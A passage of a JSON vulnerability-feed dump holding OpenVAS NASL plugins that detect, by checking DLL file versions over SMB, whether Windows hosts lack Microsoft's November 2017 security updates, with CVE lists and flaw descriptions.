(KB4048954)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4048954\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly initialize a memory address.\n\n - A security feature bypass when Device Guard incorrectly validates an untrusted\n file.\n\n - An error in the way that Microsoft Edge handles cross-origin requests.\n\n - An error when the scripting engine does not properly handle objects in memory\n in Internet Explorer.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error when the Windows GDI component improperly discloses kernel memory\n addresses.\n\n - An error when Windows Search improperly handles objects in memory.\n\n - An error when the Windows kernel fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain access to potentially sensitive information, fake unsigned file appear\n to be signed, determine the origin of all web pages in the affected browser,\n gain the same user rights as the current user, cause a remote denial of service\n against a system, test for the presence of files on disk, force the browser to\n send data that would otherwise be restricted to a destination website of the\n attacker's choice and run arbitrary code in kernel mode.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048954\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.725\"))\n{\n report = report_fixed_ver( file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.725\" );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "description": "This host is missing a critical security\n 
update according to Microsoft KB4048956", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812082", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048956)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048956)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812082\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11839\", \"CVE-2017-11840\", \"CVE-2017-11841\", \"CVE-2017-11842\",\n \"CVE-2017-11843\", \"CVE-2017-11768\", \"CVE-2017-11880\", \"CVE-2017-11788\",\n \"CVE-2017-11791\", \"CVE-2017-11827\", \"CVE-2017-11830\", \"CVE-2017-11831\",\n \"CVE-2017-11833\", \"CVE-2017-11834\", \"CVE-2017-11836\", \"CVE-2017-11837\",\n \"CVE-2017-11838\", \"CVE-2017-11846\", \"CVE-2017-11847\", \"CVE-2017-11848\",\n \"CVE-2017-11849\", \"CVE-2017-11850\", \"CVE-2017-11851\", \"CVE-2017-11853\",\n \"CVE-2017-11855\", \"CVE-2017-11856\", \"CVE-2017-11858\", \"CVE-2017-11863\",\n \"CVE-2017-11866\", \"CVE-2017-11869\");\n script_bugtraq_id(101735, 101734, 101719, 101740, 101705, 101755, 101711, 101715,\n 101703, 101714, 101721, 101706, 101725, 101727, 101722, 101737,\n 101741, 101729, 101709, 101762, 101738, 101763, 101764, 101751,\n 101753, 101716, 101748, 101732, 101742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 07:57:04 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4048956)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4048956\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 
script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly initialize a memory address.\n\n - A security feature bypass when Device Guard incorrectly validates an untrusted\n file.\n\n - An error in the way that Microsoft Edge handles cross-origin requests.\n\n - An error when the scripting engine does not properly handle objects in memory\n in Internet Explorer.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error when the Windows GDI component improperly discloses kernel memory\n addresses.\n\n - An error when Windows Search improperly handles objects in memory.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error in the way that Microsoft browsers access objects in memory.\n\n - An error when the scripting engine does not properly handle objects in\n memory in Microsoft browsers.\n\n - An error when the Windows kernel improperly initializes objects in memory.\n\n - An error when Windows Media Player improperly discloses file information.\n\n - An error when Microsoft Edge improperly handles redirect requests.\n\n - An error when the Microsoft Windows Graphics Component improperly handles objects\n in memory.\n\n - An error when Internet Explorer improperly handles page content, which could\n allow an attacker to detect the navigation of the user leaving a maliciously\n crafted page.\n\n - An error in Microsoft Edge when the Edge Content Security Policy (CSP) fails to\n properly validate certain specially crafted documents.\n\n - An error when the Windows kernel fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain access to potentially sensitive information, fake unsigned file appear\n to be signed, determine the 
origin of all web pages in the affected browser,\n gain the same user rights as the current user, cause a remote denial of service\n against a system, test for the presence of files on disk, force the browser to\n send data that would otherwise be restricted to a destination website of the\n attacker's choice and run arbitrary code in kernel mode.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for x64-based Systems\n\n - Microsoft Windows 10 for 32-bit Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048956\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17672\"))\n{\n report = report_fixed_ver( file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.17672\" );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:55:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", 
"CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11872", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11861", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "description": "This host is missing a critical security\n update according to Microsoft KB4048953", "modified": "2019-12-20T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812081", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812081", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048953)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048953)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812081\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-11839\", \"CVE-2017-11840\", \"CVE-2017-11841\", \"CVE-2017-11842\",\n \"CVE-2017-11843\", \"CVE-2017-11768\", \"CVE-2017-11880\", \"CVE-2017-11788\",\n \"CVE-2017-11791\", \"CVE-2017-11827\", \"CVE-2017-11830\", \"CVE-2017-11831\",\n \"CVE-2017-11833\", \"CVE-2017-11834\", \"CVE-2017-11836\", \"CVE-2017-11837\",\n \"CVE-2017-11838\", \"CVE-2017-11846\", \"CVE-2017-11847\", \"CVE-2017-11848\",\n \"CVE-2017-11849\", \"CVE-2017-11850\", \"CVE-2017-11851\", \"CVE-2017-11853\",\n \"CVE-2017-11855\", \"CVE-2017-11856\", \"CVE-2017-11858\", \"CVE-2017-11861\",\n \"CVE-2017-11863\", \"CVE-2017-11866\", \"CVE-2017-11869\", \"CVE-2017-11872\",\n \"CVE-2017-11873\");\n script_bugtraq_id(101735, 101734, 101719, 101740, 101705, 101755, 101711, 101715,\n 101703, 101714, 101721, 101706, 101725, 101727, 101722, 101737,\n 101741, 101729, 101709, 101762, 101738, 101763, 101764, 101751,\n 101753, 101716, 101723, 101748, 101732, 101742, 101749, 101728);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 07:36:54 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4048953)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4048953\");\n\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly initialize a memory address.\n\n - A security feature bypass when Device Guard incorrectly validates an untrusted\n file.\n\n - An error in the way that Microsoft Edge handles cross-origin requests.\n\n - An error when the scripting engine does not properly handle objects in memory\n in Internet Explorer.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error when the Windows GDI component improperly discloses kernel memory\n addresses.\n\n - An error when Windows Search improperly handles objects in memory.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error in the way that Microsoft browsers access objects in memory.\n\n - An error when the scripting engine does not properly handle objects in\n memory in Microsoft browsers.\n\n - An error when the Windows kernel improperly initializes objects in memory.\n\n - An error when Windows Media Player improperly discloses file information.\n\n - An error when Microsoft Edge improperly handles redirect requests.\n\n - An error when the Microsoft Windows Graphics Component improperly handles objects\n in memory.\n\n - An error when Internet Explorer improperly handles page content, which could\n allow an attacker to detect the navigation of the user leaving a maliciously\n crafted page.\n\n - An error in Microsoft Edge when the Edge Content Security Policy (CSP) fails to\n properly validate certain specially crafted documents.\n\n - An error when the Windows kernel fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n 
to gain access to potentially sensitive information, fake unsigned file appear\n to be signed, determine the origin of all web pages in the affected browser,\n gain the same user rights as the current user, cause a remote denial of service\n against a system, test for the presence of files on disk, force the browser to\n send data that would otherwise be restricted to a destination website of the\n attacker's choice and run arbitrary code in kernel mode.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2016\n\n - Microsoft Windows 10 Version 1607 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048953\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2016:1, win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.1883\"))\n{\n report = report_fixed_ver( file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.1883\" );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2020-01-08T13:55:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11831", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768"], "description": "This host is missing a critical security\n update according to Microsoft KB4041693", "modified": "2019-12-20T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812207", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812207", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048958)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048958)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812207\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-11827\", \"CVE-2017-11831\", \"CVE-2017-11768\", \"CVE-2017-11788\",\n \"CVE-2017-11880\", \"CVE-2017-11791\", \"CVE-2017-11834\", \"CVE-2017-11837\",\n \"CVE-2017-11838\", \"CVE-2017-11842\", \"CVE-2017-11843\", \"CVE-2017-11846\",\n \"CVE-2017-11847\", \"CVE-2017-11848\", \"CVE-2017-11849\", \"CVE-2017-11850\",\n \"CVE-2017-11851\", \"CVE-2017-11853\", \"CVE-2017-11855\", \"CVE-2017-11856\",\n \"CVE-2017-11858\", \"CVE-2017-11869\");\n script_bugtraq_id(101482);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 10:47:54 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4048958)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4041693\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Windows Media Player improperly discloses file information.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows kernel fails to properly initialize a memory address.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited this vulnerabilities 
to obtain information to further\n compromise the user's system, cause a remote denial of service against a system\n and allow to test for the presence of files on disk.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048958\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Mshtml.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"11.0.9600.18838\"))\n{\n report = report_fixed_ver( file_checked:sysPath + \"\\Mshtml.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 11.0.9600.18838\" );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11831", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11832", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", 
"CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768"], "description": "This host is missing an important security\n update according to Microsoft KB4048959", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812139", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812139", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4048959)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4048959)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812139\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11869\", \"CVE-2017-11768\", \"CVE-2017-11788\", \"CVE-2017-11880\",\n \"CVE-2017-11791\", \"CVE-2017-11827\", \"CVE-2017-11834\", \"CVE-2017-11842\",\n \"CVE-2017-11843\", \"CVE-2017-11846\", \"CVE-2017-11847\", \"CVE-2017-11848\",\n \"CVE-2017-11849\", \"CVE-2017-11850\", \"CVE-2017-11851\", \"CVE-2017-11853\",\n \"CVE-2017-11855\", \"CVE-2017-11858\", \"CVE-2017-11831\", \"CVE-2017-11832\");\n script_bugtraq_id(101742, 101705, 101711, 101755, 101715, 101703, 101725, 101719, 101740,\n 101741, 101729, 101709, 101762, 101738, 101763, 101764, 101751, 101716,\n 101721, 101726);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 10:19:08 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4048959)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4048959\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This security update includes improvements and\n fixes.\n\n - Addressed issue where the virtual smart card doesn't assess the Trusted Platform\n Module (TPM) vulnerability correctly.\n\n - Addressed issue where applications based on 
the Microsoft JET Database Engine\n fail when creating or opening Microsoft Excel .xls files.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode, to cause a remote denial of service against\n a system. Also could obtain information to further compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048959\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Mshtml.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"10.0.9200.22297\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Mshtml.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 10.0.9200.22297\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11835", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11852", "CVE-2017-11848", "CVE-2017-11831", 
"CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11832", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11768"], "description": "This host is missing a critical security\n update according to Microsoft KB4048957", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812149", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812149", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048957)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048957)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812149\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11869\", \"CVE-2017-11768\", \"CVE-2017-11788\", \"CVE-2017-11880\",\n \"CVE-2017-11791\", \"CVE-2017-11827\", \"CVE-2017-11834\", \"CVE-2017-11835\",\n \"CVE-2017-11837\", \"CVE-2017-11838\", \"CVE-2017-11843\", \"CVE-2017-11846\",\n \"CVE-2017-11847\", \"CVE-2017-11848\", \"CVE-2017-11849\", \"CVE-2017-11851\",\n \"CVE-2017-11852\", \"CVE-2017-11853\", \"CVE-2017-11855\", \"CVE-2017-11856\",\n \"CVE-2017-11858\", \"CVE-2017-11831\", \"CVE-2017-11832\");\n script_bugtraq_id(101742, 101705, 101711, 101755, 101715, 101703, 101725, 101736,\n 101722, 101737, 101740, 101741, 101729, 101709, 101762, 101763,\n 101739, 101764, 101751, 101753, 101716, 101721, 101726);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", 